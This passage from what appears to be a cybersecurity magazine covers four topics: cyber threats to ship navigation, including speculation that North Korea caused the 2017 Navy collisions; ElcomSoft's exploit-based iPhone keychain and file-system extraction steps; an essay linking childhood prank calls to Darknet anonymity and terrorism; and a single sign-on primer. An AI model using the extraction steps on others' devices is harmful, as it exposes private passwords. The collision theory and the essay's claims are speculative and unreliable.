Navigation Center that its GPS system had been disrupted and that over 20 ships in the same area had 

been similarly affected.6 In Asian waters, deadly collisions happened twice in two months; In June 2017, 

the USS Fitzgerald was struck by a container ship off the coast of Japan, killing 7 sailors. Later during 

the year, an oil tanker smashed the USS John S. McCain near Malaysian coast and 10 sailors died.7 

There were also two other lesser-known incidents in 2017: in January, the USS Antietam ran aground 

near its base in Japan and in May the USS Lake Champlain collided with a South Korean fishing vessel.8 

Consequently, Vice Admiral Joseph Aucoin was relieved of his duty as commander of the U.S. 7th Fleet, 

the largest forward-deployed U.S. fleet based in Japan and covering Asia.9 

The causes of all these incidents are not clear. Some experts blame the weather, the heavily reliance on 

technology, the feeble signal of GPS, cyberattacks, the diminution of crew members or the high pace of 

deployment lacking training and maintenance. Regarding the number of incidents in a less-than-one-year 

period and the highly disputed regions where incidents happened (South East Asia and East Asia), the 

theory of a deliberated influence on navigation systems through cyberattacks is legitimate, especially 

when the navigation system used is analyzed. 

Ships orientate themselves through Global Navigation Satellite System (GNSS) with many countries 

using their own: GPS for the U.S., GLONASS for Russia, GALILEO for the E.U., QZSS for Japan, BeiDou 

for China, and NAVIC for India. Although precise to a few meters, this technology is not highly secure 

because the message is feeble and can be hacked. The same year of these incidents, a security 

researcher based in France was able to enter the satellite communications system of a ship: Through 

Shodan, a specific search engine that can reveal connected devices, and by entering a simple username 

(admin) and password (1234), he accessed the communication center of a commercial ship and posted 

his performance on Twitter: “I’m connected to a mother****ing ship as admin right now. Hacking ships is 

easy”.10 

New Alternatives 

To prevent this over-dependency on GNSS for Positioning, Navigation and Timing (PNT), some states 

are developing alternatives that rely on radio frequency, an old technology used since WWII. One of 

5 

SAUL Jonathan. “Cyber threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017 

https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT 

6 

Ibid. 

7 

FIFIELD Anna. “Bodies of all 10 sailors missing on USS John S. McCain have been recovered”, The Washington Post, Aug 27, 2017 

https://www.washingtonpost.com/world/bodies-of-all-10-sailors-missing-on-uss-john-s-mccain-have-been-recovered/2017/08/27/a2af6c4a-8b8c-11e7- 

a2b0-e68cbf0b1f19_story.html 

8 

BARANIUK Chris. “Why it’s not surprising that ship collisions still happen”, BBC, Aug 22, 2017 

http://www.bbc.com/future/story/20170822-why-its-not-surprising-that-ship-collisions-still-happen 

9 

AFP. “U.S. Warship Collisions Raise Cyberattack Fears”, Security Week, Aug 23, 2017 

http://www.securityweek.com/us-warship-collisions-raise-cyberattack-fears 

10 

CHAMBERS Sam. “Ship’s satellite communication system hacked with ease”, Splash 24/7, Jul 19, 2017 

http://splash247.com/ships-satellite-communication-system-hacked-ease/ 



these systems is called eLoran (Enhanced LOnge-RAnge Navigation) and although it is less accurate, 

regional, and only two-dimensional, it offers a powerful signal that deters jamming or spoofing.11 The 

cost and the political inertia thwarted this technology, but this is likely to change given these events. 

South Korea is currently testing this technology and Russia is developing its own eLoran named 

eChayka.12 In the U.S., the Director of National Intelligence told a Senate committee that the global 

threat of electronic warfare attacks against space systems would rise in coming years and the U.S. Navy 

launched a Hack-Our-Ship event to assess cyber threats at sea, such as hacking a complex system 

software system simulating the ones used to control the U.S. Navy fleets.13,14 

Military and Economic Implications 

In network-centric warfare, the military relies on information gathering to Observe, Orient, Decide, Act 

(the OODA loop) and GNSS are part of the tools to collect it. In the battlefield, it is the capacity to make 

the right decision as quickly as possible, and most specifically quicker than your enemy, that makes the 

difference between victory/life or defeat/death. Therefore, an army relying too much on one technology 

could be “blinded” during a conflict and unable to allocate forces efficiently. 

Following 19th Century American Navy Strategist Alfred T. Mahan, the U.S. developed a great power 

projection capability after WWII that enables it to rapidly deploy military means to defend any interest 

whether political, economic, military or humanitarian. Power projection is a mix of hard and soft power, 

depending on the situation. This approach is materialized by aircraft carriers and the separation of fleets 

allocated to specific regions of the globe (7 for the U.S. Navy). 

Aircraft carriers are not travelling the sea alone and an entire structure of ships and submarines escort 

them, known as a carrier strike group (CSG), with a total crew of more than 7,500.15 The total acquisition 

cost of a CSG exceeds $25 billion, an air wing (the aircrafts on the aircraft carrier) another $10 billion and 

estimated annual operating costs are around $1 billion.16 Currently, the U.S. has 10 Nimitz-class nuclearpowered 

supercarriers. Therefore, a major cyberattack on navigation systems, for example, could 

paralyze an entire CSG and considerably diminish the U.S. ability to maneuver. 

On the economic side, the world’s largest container ship and supply vessel company, Moller-Maersk, 

suffered from the wiper malware attack named NotPetya and the company reported a loss between USD 

11 



12 

DUNN John E. “Cyberattacks on GPS leave ships sailing in dangerous waters”, Naked Security, Aug 7, 2017 

https://nakedsecurity.sophos.com/2017/08/07/cyberattacks-on-gps-leave-ships-sailing-in-dangerous-waters/ 

13 



14 

OWENS Katherine. “Navy conducts ‘Hack-Our-Ship’ cybersecurity event”, Defense Systems, Mar 13, 2017 

https://defensesystems.com/articles/2017/03/13/hacknavy.aspx 

15 

WISE David W. “The U.S. Navy’s Big Mistake – Building Tons of Supercarriers”, War Is Boring, Dec 25, 2016 

https://warisboring.com/the-u-s-navys-big-mistake-building-tons-of-supercarriers/ 

16 

Ibid. 



200-300 million for Q3 2017.17 More specifically, navigation systems such as the Electronic Chart 

Display (ECDIS) are very vulnerable and have also been hit with different attacks being reported in Asia. 

According to the maritime technical lead at cyber security firm NCC Group, "Ecdis systems pretty much 

never have anti-virus".18 

Pyongyang Hackers are Smart 

Both of the military vessels involved in collisions, the USS Fitzgerald and the USS John S. McCain, are 

guided missile destroyers equipped with the Aegis Ballistic Missile Defense System (BMDS), which is a 

system allowing the interception of an ICBM (Intercontinental Ballistic Missile), the ones that are currently 

being tested by North Korea and usually equipped with one or multiple nuclear warheads. An ICBM has 

four phases: boost, post-boost/ascent, midcourse and terminal (reentry in the atmosphere). The Aegis 

BMDS aims at destroying an ICBM during the post-boost/ascent phase (before the missile leaves earth’s 

atmosphere). 

The Lazarus hacking group, famous for the Sony breach in 2014 and allegedly linked to North Korea, 

targets individuals associated with U.S. defense contractors with the same tools and tactics of the Sony 

breach. This time, the phishing emails display fake job listings and companies’ internal policies.19 Some 

jobs listed were for the US (Terminal High Altitude Area Defense) THAAD system, which is a BMDS and 

intercept an ICBM in its terminal phase (after the missile re-enters in the atmosphere). 

Therefore, if the four U.S. Navy collisions in Asian waters are due to a cyberattack, the explanation could 

be that the North Korean government is attempting to infiltrate the U.S. military system to be able to 

collect information on the full spectrum of BMDS and, at best, disrupt the defense systems against its 

ICBM. On the diplomatic side, it could be a strong message sent to the US and its Asian allies assuring 

them that Pyongyang has serious capabilities and that it would be better to negotiate with it than escalate 

tensions. 

This strategy is part of a general trend in APT (Advanced Persistent Threats), long-term targeted specific 

cyberattacks mixing a combination of social engineering, cyberweapons, and vectors to get inside 

networks, instead of hacking directly the big fish such as the Department of Defense or a big player in 

weapons (Aegis, Boeing, Lockheed Martin, etc.), hackers will target a third party working for these targets. 

Indeed, their cybersecurity posture will be lower than a critical administration or company with 

technologies and processes in places regarding cyberdefense, and with aware employees towards 

phishing campaigns. 

17 

MIMOSO Michael. “MAERSK Shipping Reports $300M Loss Stemming from NotPetya Attack”, Threatpost, Aug 16, 2017 

https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/ 

18 

BARANIUK Chris. “How hackers are targeting the shipping industry”, BBC, Aug 18, 2017 

http://www.bbc.com/news/technology-40685821 

19 

BARTH Bradley. “Lazarus Group tied to new phishing campaign targeting defense industry workers”, SC Media, Aug 14, 2017 

https://www.scmagazine.com/lazarus-group-tied-to-new-phishing-campaign-targeting-defense-industry-workers/article/681701/ 



Future Tensions at Sea 

Among many strategic hotspots, the most sensitive ones are currently the Indian Ocean, the South and 

East China Seas, and, for the foreseeable future, the Artic. 

The Indian Ocean is now a space of geopolitical criticality from a maritime perspective, especially now 

that the U.S. wants to improve its relations with New Delhi to counterbalance Beijing’s aspirations in the 

context of the BRI (Belt and Road Initiative). China is determined to change the status quo in this region 

and is investing in ports (i.e. the String of Pearls) to control the flow of merchandise along sea lines from 

China to the Middle East and Africa. 

Indeed, these sea lines through the Indian Ocean are vital for China’s oil imports, as about 40% comes 

through the Strait of Hormuz and over 80% through the Malacca Strait.20 Thus, the rationale of shifting 

from a land-based armed force to a sea-based one is to defend these interests at sea and protect China 

as a regional hegemon. Hence, the people’s liberation army is building aircraft carriers, submarines, 

patrol vessels, and has put in place an A2/AD (Anti Access/Area Denial) tactic with investments on shorebased 

anti-ship missiles. Ultimately, China wants to push the U.S. behind its second island chains (at the 

east side of the Philippine Sea). 

As pointed out by The Economist, the Asia Pacific is the trade region of the future: Eight out of the world’s 

ten busiest container ports are there. Two-thirds of the world’s oil shipments travel across the Indian 

Ocean. Almost 30% of maritime trade goes across the South China Sea; it accounts for over 10% of 

world fisheries production and is thought to have oil and natural-gas deposits beneath its seabed.21 

Another strategic hotspot will emerge northward: the Arctic. Within decades, the ice melting phenomenon 

will open shipping lanes, allowing vessels like Russia’s first ice class LNG (Liquefied Natural Gas) tanker 

to travel through the region. It will also increase disputes for the access to resources and to preserve its 

fragile ecosystem.22 

Like in Rudyard Kipling’s novel “Kim” where he made popular the great game at stake between the British 

and Russian empires to control Central Asia in the 19th Century, the new great game is now between 

the US and China for the control of all Asia. This rivalry will encompass the use and leverage of sea 

power as naval strategist Alfred T. Mahan put in perspective in “The Influence of Sea Power Upon History” 

as national prosperity and power depend on the control of world's sea-lanes, thus: "Whoever rules the 

waves rules the world".23 

20 

The Economist. “Who rules the waves?”, The Economist, Oct 17, 2015 

https://www.economist.com/news/international/21674648-china-no-longer-accepts-america-should-be-asia-pacifics-dominant-naval-power-who-rules 

21 

The Economist. “Who rules the waves?”, The Economist, Oct 17, 2015 

https://www.economist.com/news/international/21674648-china-no-longer-accepts-america-should-be-asia-pacifics-dominant-naval-power-who-rules 

22 

Author interviews. “‘Stavridis’ Book ‘Sea Power’ Explains Why Oceans Matter in Global Politics”, NPR, Jun 6, 2017 

http://www.npr.org/2017/06/06/531701056/stavridis-book-sea-power-explains-why-oceans-matter-in-global-politics 

23 

MAHAN Alfred Thayer, “The Influence of Sea Power upon History: 1660-1783” Little, Brown and Company, Boston, 1890 




Julien Chesaux is a Cyber Security Consultant at Kudelski Security, a 

Swiss and American cyber security company. Julien mainly works on 

cyber security, information security and geopolitics analysis in order to 

help clients to find solutions regarding their threats. He is also a speaker 

and writer for different think tanks, journals and events. He has worked in 

diplomacy and cyber security for 10 years in Switzerland, Australia, the 

Balkans and France. His main research interests are Global Security, 

Cyber Geopolitics, and International Affairs. 

LinkedIn profile: www.linkedin.com/in/julien-chesaux-65279456 

You can reach me at julien.chesaux@gmail.com 



Iphone Extraction Without A Jailbreak 

Imaging the file system and decrypting the keychain from iOS devices without jailbreaking 

By Oleg Afonin, Security Researcher, ElcomSoft Co.Ltd. 

Traditionally, forensic experts without access to proprietary technologies had relied upon jailbreaks to 

perform the lowest-level extraction of Apple iOS devices. Using jailbreaks, even advanced ones exploiting 

hardware vulnerabilities, presents a number of challenges. In this article, we are offering an alternative 

method for accessing the content of iOS devices that does not require jailbreaking. 

Jailbreak-based acquisition 

Before covering jailbreak-free extraction, let’s talk about jailbreaks. 

Why is a jailbreak needed during the course of file system extraction? Jailbreaking the device allows 

experts to raise privileges to the level required to access the protected file system on the device, which 

is simply not possible on Apple devices without superuser access. In addition, a jailbreak was the only 

way to extract and decrypt the complete content of the keychain containing all of the user’s saved 

password and things such as certificates, identities and encryption keys (e.g. keys to encrypted 

databases of third-party password managers). In other words, a jailbreak was (and still is) used to obtain 

the required level of privileges for accessing things such as application sandboxes, stored passwords 

and encryption keys. 



Why not just keep using a jailbreak? 

If jailbreaks are such a great thing, why don’t we keep using them for low-level extractions? The thing is, 

jailbreaks bring their share of problems. First and most importantly, public jailbreaks were never meant 

for mobile forensics. Installing a jailbreak unnecessarily modifies the system partition (making the postacquisition 

future of the device iffy). Since public jailbreaks are designed to allow running unsigned code 

(such as the various apps downloaded from third-party app stores), they do a lot more (and a lot deeper) 

modifications to the system than would be necessary for the purpose of forensic acquisition. 

Finding the right jailbreak and installing it properly may also become a challenge if you are not 

accustomed to this sort of things. For these and other reasons, jailbreaking may not be an option for 

some experts. This is where jailbreak-free acquisition comes to help. 

How jailbreak-free acquisition works 

In the previous chapter, I wrote that one needs low-level access to the file system in order to perform the 

extraction, and this still stands even if you are not going to use a jailbreak. We developed a different 

method for obtaining the required level of privileges on a wide range of iOS devices. Explaining the 

essence of the method brings us back to jailbreaking. 

Essentially, a jailbreak exploits several vulnerabilities discovered in a given version of iOS or a range of 

versions of iOS. The vulnerabilities are exploited consecutively one after another, which makes it a chain 

of vulnerabilities to exploit. A jailbreak requires a number of different exploits to escape sandbox, obtain 

superuser access and disable various protections iOS has in place to prevent this sort of things. Finally, 

a jailbreak opens read/write access to the system partition and patches several files in order to disable 

signature verification, which allows installing apps missing Apple approval from third-party app stores. 

While this is a grand oversimplification, you get the idea: a jailbreak does a lot of things that aren’t 

necessary for just extracting the file system and obtaining the keychain. 

A given jailbreak can be installed on a given version of iOS (or a range of versions of iOS). Different 

jailbreaks are required to break into the different versions of the system since different exploits are 

required. Our method automatically detects the installed version of iOS and applies exactly those exploits 

that are minimally required to obtain access to the file system. To do that, one must sign and install the 

‘agent’ app to the device, and then use that agent to extract the file system and decrypt the keychain. 

Unlike jailbreaks, the agent performs all modifications in the device’s volatile memory (RAM) without 

writing any unnecessary stuff into persistent storage. The agent does not even touch the system partition, 

leaving the post-acquisition device perfectly usable and updatable. 

Why choose jailbreak-free extraction over jailbreaks 

There are numerous advantages of agent-based extraction over jailbreaks. 

1. Jailbreak-free extraction is safe. The agent does not touch the system partition, leaving the device 

in a clean state after the acquisition. 



2. Clean and forensically sound. The agent does not write any unnecessary stuff onto the data 

partition, and does not leave any traces behind sans a few records in the system log. 

3. Much easier to handle. Most jailbreaks (except checkra1n, which uses a hardware exploit) are 

limited to a narrow range of iOS versions. The agent has all the exploits required to gain access 

to the data, and automatically applies the right exploit for a given version of iOS. 

4. Robust operation. Jailbreaks are wonky to install, (very) frequently failing without an obvious 

reason and no path forward. We are yet to see a single case where the agent would fail on a 

supported platform. 

5. Offline operation. The agent can and should be installed with the device being in Airplane mode. 

An Internet connection on the iPhone is never required, making it a safe, risk-free extraction. 

Agent-based extraction also has two major drawbacks. 

1. You will absolutely need a Developer account with Apple to sign and install the agent. A Developer 

account with Apple costs money (around $100/year if you use a personal one). 

2. The agent is available for a wide but still limited range of iOS versions, currently supporting iOS 

10.0 through iOS 13.4.1 inclusive. Extracting an iPhone running a newer iOS build would be only 

possible if we discover the corresponding exploit. Alternatively, the checkra1n jailbreak may be 

available if the device is an iPhone 8, 8 Plus or iPhone X or older. 

How to use jailbreak-free extraction 

Jailbreak-free extraction is available through Elcomsoft iOS Forensic Toolkit. You will also need an Apple 

ID enrolled in Apple’s Developer Program, and have an app-specific password created in your profile. 

Write down that password, you’ll need it to sign the extraction agent. The acquisition steps are: 

1. Connect the iPhone to your computer. Approve pairing request (you may have to enter the 

passcode on the device to do that). 

2. Launch Elcomsoft iOS Forensic Toolkit. The main menu will appear. 

3. We strongly recommend performing logical acquisition first (by creating the backup, extracting 

media files etc.) 

4. For agent-based extraction, you’ll be using numeric commands. 

5. Press 1 to install the agent onto the iPhone. Enter the Apple ID and the app-specific password 

you’ve created in the developer profile, then type the ‘Team ID’ related to your developer account. 

6. The agent is installed on the device. Tap on the Agent icon on the iPhone to launch it, and keep 

it in the foreground during the extraction. 

7. Press 2 to extract and decrypt the keychain (you can view it in Elcomsoft Phone Viewer). 

8. Press 3 to capture the file system image. The tool uses the TAR format to save the file system 

image. You can view it with Elcomsoft Phone Viewer or third-party forensic tools. 

9. Press 4 to clean-up and uninstall the agent from the iPhone. 



Conclusion 

Jailbreak-free acquisition has numerous advantages over jailbreaks, and only two drawbacks. If your iOS 

device falls in the supported range of iOS 10.0 through 13.4.1, we strongly recommend sticking with the 

new, jailbreak-free acquisition method. If the iPhone you are analyzing is based on an unsupported 

platform, a compatible jailbreak may still be an option. 


Oleg Afonin is ElcomSoft’s security researcher and mobile forensic 

specialist. He is a frequent speaker at industry-known conferences 

such as CEIC, HTCIA, FT-Day, Techno Forensics and others. Oleg 

co-authored multiple publications on IT security and mobile 

forensics. With years of experience in digital forensics and security 

domain, Oleg led forensic training courses for law enforcement 

departments in multiple countries. 

Oleg can be reached online at (o.afonin@elcomsoft.com, https://twitter.com/elcomsoft or 

https://t.me/elcomsoft) and at our company website www.elcomsoft.com 



How to Maintain Anonymity in Communications? 

By Milica D. Djekic 

The kids would love to play the games. They would not be attracted with the computer’s games only, but 

rather with some being so creative, engaging and imagination needing. As they do so they would imagine 

that they are some fictional characters and the entire play would get some deep meaning to them. That’s 

how the children would build up their personalities, psychology and minds. When they grow up some of 

those habits would remain with them. Maybe they would not express those sides of their personalities 

then, but they would cope with the clear memories and subconscious drives about those occurrences. 

We would never know what can trigger some kind of the behavior with the adult people as long as we 

are not familiar with their childhood and personal development. Some kids would enjoy playing the social 

games developing their social intelligence and skill, while the others would choose the world of loneliness 

doing some reading, writing or drawing. The both cases could give the amazing creativity to the 

prospective adults and in our opinion – it’s important to find the balance between the social and 

introspection’s skills. When the parents are rising their kids they should know that the best practice in 

such a case could be to let their offspring become what they want to be, but some kind of supervision 

and advising is necessary in order to define the borders that the youth can expect in their lives and social 

connections. The well-applied measure of forming someone’s character is through the model of 

rewarding and punishing and the proper family education must take that sort of teaching into account. 

One of the favorite games to many kids is making the call and talking to someone through the tissue. In 

such a game, they would make a voice and get completely unrecognizable as they would use some 

covering to speak through so. They would usually do so in the company for getting some fun and joking 

the people on the line. Basically, everything would start as so innocent kids’ game and literally the stuffs 

are under control as long as that behavior is just the way of playing. Also, there would be some children 

that would make their voice being unrecognizable doing some misrepresentation and make the fully 

fictional story about anything. Someone would say that their imagination could lead them so far away, 



ut the case is if such a behavior is not restricted at its beginning it can cause the serious troubles the 

later on if that person does not quit with such habits. In other words, those individuals could continue 

playing “no one would see me” game and get the real concern to their surroundings. Any security 

professional would recognize it’s all about someone who would cope with the deep need to hide his 

identity and those habits could get adopted early in the childhood. So, in order to prevent the new 

generation of weird adults it’s needed to follow the progress of the children not only through schooling, 

but rather via the social activities. So, if the strict questions with the psychology’s interview are made and 

if anyone is reporting about such a strange behavior some measures of teaching should get applied. 

Practically, the next step in such a development could be that such individuals could figure out that the 

phone line with the changed voice is not that interesting toy any longer, so some kind of the transmission 

into the cyberspace could work better. 

The fact is the computer with the internet connectivity could provide us a plenty of opportunities to remain 

hidden behind some profile or account. In addition, there are the entire anonymity solutions being 

developed that can serve to stay anonymous and still in position to share your story or content with many. 

Indeed, these sorts of the systems could get used for the security purposes when needed to protect your 

identity and exchange some vitally important information. So, the phone with the tissue on is for the kids 

– the real hackers would rely on so sophisticated cyber infrastructure. From such a point of view, it’s only 

the business and many would do that for the money, but there are still so many unhealthy minds that 

would choose their victims in order to do bullying or provide the fake news to the communities. The main 

concern with the Darknet anonymity systems is that they would be the role-based ones and they would 

use the quite strong encryption, so if on the inaccessible spots there would be some difficulties to confirm 

the identity of the information sharer. We would say the places that are not easily approachable for a 

reason we would get in mind the terrorist groups that would take advantage over such well-developed 

systems and send the disinformation wherever they can. In other words, the innocent kid’s game could 

lead to the serious security concern, so from this perspective – the Pandora box would get opened as 

there would appear so many questions pointing the motives of the heavy cases to commit so harsh 

crimes. 

Even the kid can get how significant can be to appear as the trusted person and they can try to imitate 

the voice of the adult people in order to trick or confuse someone. The similar situation is with the Darknet 

asset as so many its users would recognize the power of the trusted account or at least convincing 

someone that they are the trusted persons. If anyone accepts that he is talking to the trusted individual 

he can give the information he normally would not and the bad guys could use such a campaign to collect 

the intelligence and figure out something they would never do. The timing and accurate information can 

mean the victory in the war, so it’s from the strategic significance to adopt the measures and techniques 

in order to prevent, observe and respond to such and similar cases in the practice. 

Who is from another Side of Cord? 

Doing some anonymity operations the bad guys would go through some experience believing something 

so important is happening on. Possibly they would develop those needs in the childhood and they would 

cope with the very vivid inner experiences that would motivate them to proceed with such an activity. 

Their motto could be that no one would even get who is on another side of the cord, so from their point 

of view it may appear as quite exciting and interesting doing so. The aim of the terrorism is to spread the 

fear and panics amongst the community members, so that’s why someone with the vivid imagination 

would make so horrifying stories that would get used to intimidate the quite broad population. Probably 

that special effect suggesting that – I know you, but you do not know me! – would deeply motivate the 

bad guys to believe they have some sort of the power over other people’s lives and security. It’s quite 



dangerous playing those games in the adulthood, so what’s so needed is to understand the motives of 

the persons doing so for a reason once the motive is defined the crime would stop. 

Why Does Identity Matter? 

It’s not only about the terrorist and criminal organizations to hide their identity – so many defense 

professionals would choose to carefully manage their identity as the way of security and privacy 

measures getting applied on their tasks. In other words, it’s not smart at all going around and sharing all 

you know with everyone as that could be the huge threat to someone’s life and business. So, the wellknown 

Deep Web solutions are designed by the defense communities, but at the moment they are 

available to anyone for more or less obvious reasons. The identity matters in any case and once the 

people are convinced that some account is trusted they can try to share a lot of findings with such a 

profile. The modern history would teach us how life can be hard and why it’s important to take some 

measures of protection. 

The Deep Web systems could get used by the media staffs in order to bring the story to the audience. 

Practically, anyone sitting on the comp and writing to the journalist could get approved as the information 

source to some media group for a reason he can offer the content frequently. So, that’s how the public 

opinion could get created and managed and in our belief – that’s so dangerous weapon that can 

compromise the media professionalism. No ethical media house would trust to anyone and before 

anything is published there should be the several levels of the confirmation. In other words, anyone 

looking for the exclusives on the Tor should know that he is possibly working for the other side of the law. 

The Need to Hide Who You Are 

Sometimes the intelligence sources reporting to some defense agency would need to hide their identity 

for the security needs. The agent on the other side of the communications would deal with the clear 

picture in a term who is talking to him. Also, the security organizations can confirm a lot of that, so it’s 

quite clear they would be highly confident about the sources of the information. Being the source of the 

findings to anyone creditable is so heavy and time consuming task and it needs the reliability, accuracy 

and skill in order to get approved for such a service. Apparently, the defense staff would hide who he is 

as well because it’s not necessary to know any sort of the personal details of that guy as the task is to 

provide so helpful findings to the agency. How such an effort would get further directed it’s not up to the 

informant – it’s only up to that defense team. 

The Anonymity Information Exchange Systems 

The most known privacy infrastructure worldwide is the Tor anonymity system that would cope with the 

millions of users every single day. From time to time that service would get shut down, but it’s more about 

such network’s configuration rules. Essentially, the Tor service can offer the good privacy and it’s mainly 

reliable to its users. It would cope with the multi-level encryption, so it’s quite trickery to anyone to 

challenge its security capacities. Let’s say the Tor is the quite trusted system that would attract so many 

professionals from many areas of interest. Apparently, it would cope with its dark side being one of the 

biggest Darknet service providers in the world. It would get the real oasis to the criminals, terrorists and 

hackers as it would offer a lot of benefits to the users seeking to remain safe. 



How Bad Guys Could Take Advantage of So 

Maintaining the anonymous communications could be the real challenge and so many people across the 

globe would cope with such a fact. Especially, the bad guys would know how to take advantage over 

such an infrastructure as they would choose to stay invisible once the authorities come to get them. Some 

of their tactics would show they would deal with so many security and privacy accounts and for such a 

reason it can be difficult tracking what they really do. Indeed, there are the ways to figure out something, 

but the majority of their activities would stay well-camouflaged to the investigators and intelligence officers 

as they would use many accounts, many different locations and plenty of the machines getting their own 

web connectivity. In so many cases, it would be even the challenge identifying the threat as the entire 

search could be extremely time consuming. Once the first bad actor is found there are the better chances 

to locate the rest of his network. 

The Final Comments 

As we said, the kids love to play the games and the adult folks could keep with those habits the later on 

in their lives. Anyhow, our story can begin as quite innocent, but the impacts of the illustrated behavior 

could be enormous. In our understanding, it’s time to start to think if we want to make any progress as 

the human kind. The best way to use your brain cells is to observe so simple stuffs in your environment. 

Once you get aware what is going on around you – you would start correlating the things with each other 

and getting the rules of those linkages. The task is hard, but – in our opinion – so obtainable! 


Milica D. Djekic is an Independent Researcher from 

Subotica, Republic of Serbia. She received her engineering 

background from the Faculty of Mechanical Engineering, 

University of Belgrade. She writes for some domestic and 

overseas presses and she is also the author of the book 

“The Internet of Things: Concept, Applications and Security” 

being published in 2017 with the Lambert Academic 

Publishing. Milica is also a speaker with the BrightTALK 

expert’s channel. She is the member of an ASIS 

International since 2017 and contributor to the Australian 

Cyber Security Magazine since 2018. Milica's research 

efforts are recognized with Computer Emergency Response 

Team for the European Union (CERT-EU), Censys Press and EASA European Centre for Cybersecurity 

in Aviation (ECCSA). Her fields of interests are cyber defense, technology and business. Milica is a 

person with disability. 



Everything You Want to Know About Single Sign-On 

By Ayman Totounji, Founder , Cynexlink 

Wikipedia defines Single sign-on or SSO as “an authentication scheme that allows a user to log in with a 

single ID and password to any of several related, yet independent, software systems.” 

Simply put, Single sign-on is a session or a user authentication service that allows a user to use a single 

set of login credentials—username and password—for multiple applications. 

Or you can say that you can gain access to several applications with just one set of passwords and 

usernames. 

This way, it simplifies password management for both businesses and individuals. 

An example of an SSO login is Google's products. For example, if you log into Gmail, you automatically 

get access to Google Drive, Google Photos, YouTube, and other Google services. 



How it Works 

Whenever you sign in to use an SSO service, the service creates an authentication token that remembers 

that you are verified. This authentication token is a sort of digital information being saved either in the 

user’s browsers or within the SSO service’s servers, like a temporary ID card provided to you. 

Any app that you access will be authenticated by the SSO service. The SSO approves the user's 

authentication token to the app and the user is granted access. But a user will be required to sign in 

through the SSO service if they haven't done it yet. 

However, an SSO service might not necessarily keep a user in its record, since it doesn't save user 

identities. Most SSO services work by checking user credentials with a different identity management 

service. 

SSO just confirms whether your login credentials match with their identity in the database, without looking 

after the database themselves—just like a record-keeper who can access the records easily without 

having the entire catalog memorized. 

I think these steps will help you understand better how Single Sign-On functions 

• The website first checks to see if you have already been approved by the SSO solution so that it 

can give you access to the site. 

• If you haven’t, it redirects you to the SSO tool to log in. 

• You are asked to fill credentials. 

• The SSO solution asks your identity provider or authentication system to confirm your identity. 

• The data is then transferred to the website by the SSO tool. It also takes you back to that site. 

• After the sign-in process, the site verifies authentication verification data with you as you pass 

through the site to confirm that you are authenticated each time you move to a new page. 

What are the Benefits of Single Sign-On? 

SSO lets users access all of their apps with a single set of passwords and usernames. Here I have 

discussed some benefits of Single Sign-On service. 

Increasing Productivity: 

SSO boosts productivity. When all of the apps are placed in one convenient portal, it accelerates access 

to required systems and resources. 

With SSO in place, a user needs to log in once and get one-click access to all the apps they require. 

Although the amount of time saved might seem small, all of the time generally spend logging into 

individual resources adds up. 

SSO also reduces the time users spend going through password-related hassles, since one only requires 

using a single set of a password. And this can make a difference when you have to manage some 40 

passwords. Isn't it? 



Therefore, users can focus on the important tasks rather than fiddling with multiple passwords. 

Minimizing Risk Associated with Bad Passwords Habits: 

Passwords can cut both ways. While they fortify your data, they can be used to steal all information if 

they get into the hands of a threat actor. That’s why they are also defined as a double-edged sword. 

Top of that, most passwords are not easy to remember and it is time-consuming to type into each 

resource you need to get into. While changing your passwords is important, it just adds to the frustration 

for some users. 

Enter SSO. 

If you use SSO, you are less likely to type password down, repeat passwords, make simple or commonly 

used passwords, or resort to other bad password practices. 

Minimizing Helpdesk Costs: 

Given that SSO minimizes the requirement to use the number of passwords, users are less likely to 

request the IT department for password resets. This can save time and hassles as resetting a simple 

password can eat up the helpdesk’s valuable time. 

According to one study, 20-50% of all help desk requests are for password resets. Providing a single set 

of credentials to employees will simply reduce this need. 

Improving Security Efficiencies: 

From the security viewpoint, it is quite obvious to be bothered by the use of the same password for all 

the apps. What if your master password is stolen? 

Yeah, keeping one password can make your systems vulnerable. 

And it is equally true that SSO can minimize password theft if used carefully. 

This is because users only need to remember a single password for many apps, meaning that they can 

focus on to make that single password secure and stronger. 

Plus, they are less likely to write it down, unlike in the case of multiple passwords that have to be noted 

down. This way, it minimizes the risk of password theft. 



Understanding the Types of Single Sign-On 

• ENTERPRISE SINGLE SIGN-ON is considered a primary authentication, intercepting login 

requests when needed by secondary applications to complete the user and password fields. This 

system lets one system interacts with other systems that might disable the login screen. 

• WEB SINGLE SING ON or WEB SSO works with an application which can be accessed online, 

and its works to verify a user on multiple applications by eliminating the need of getting identified 

again. 

The proxy server then intercepts the access data as well as facilitates the communication 

following the transferring the results to the computer that requested it. Unidentified users are sent 

to an authentication service, returning a successful login. 

• FEDERATED IDENTITY relies on an identity management solution that utilizes standards to let 

application to identify clients without having them to go through the authentication process again 

and again. 

• OPEN ID is a decentralized SSO procedure that involves the storing of user IDS at a URL that 

any server can approve. 

What are the Challenges Associated with Single Sign-On 

• More robust passwords should be created. This is because if an SSO account is hacked, others 

under the same authentication can easily get exposed to the attack. 

• A breakdown with SSO at one site can affect all the linked sites. Therefore, it is important to 

choose the right SSO system. It should be reliable and equipped with the plans to deal with 

interruptions. 

• Your SSO is affected by the problem in your identity provider. The provider's weakness in any 

kind of interruption becomes your problem as well, and it might go beyond your control. Again, 

you need to work with an efficient vendor. 

• If a threat actor gets into your identity provider user account, all your linked systems are easily 

getting vulnerable. This can be termed as a classic single point of failure and should be addressed 

in the planning process. An efficient SSO provider ensures top-notch security. 

• It is not easy to set up SSO due to the different environments. 

• SSO is not recommended for the multi-user computers. After all, it causes sheer inconvenience 

and security issues if other users use a machine that has logged in accounts of someone. 



• Some SSO vendors can provide their data to third parties. 

How to Choose a Single Sign-On Solution 

There are some key factors to consider while choosing a Single Sign-On Solution. 

Personalized User Experience: 

Check if the vendor lets you customize the login page to your corporate branding. After all, an efficient 

single sign-on process doesn't confine the users in a box where everything looks alike. 

Access to all the Apps You Require: 

Make sure your sign-on vendor lets you use all the apps you require. 

Security: 

Security is a crucial point to look for in the vendor. Make sure they protect your password and let you 

integrate with AD/LDAP for quick access to your data. Reliability is also a key as the breakdown is often 

associated with these services. Therefore, make sure to work with the one who ensures nearly 100% 

uptime so that you can team can access their apps when they require them. 

Scalability: 

SSO solutions should grow with your organization. There is no use of changing the vendors now and 

then just because they are too big or too small for your needs. 

Bottom Line: 

So, you must have understood important things about SSO. It is a great solution to one big problem: how 

to manage the increasing number of users across a big ecosystem of apps and services. 

